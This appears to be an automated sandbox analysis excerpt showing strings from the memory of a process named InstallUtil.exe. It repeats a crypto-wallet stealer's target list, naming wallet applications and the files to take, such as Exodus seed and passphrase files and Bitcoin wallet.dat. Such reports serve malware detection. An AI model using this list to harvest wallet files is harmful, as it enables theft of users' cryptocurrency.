                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454730530.0000000000F51000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                        Source: InstallUtil.exe, 00000004.00000002.2454730530.0000000000F51000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda 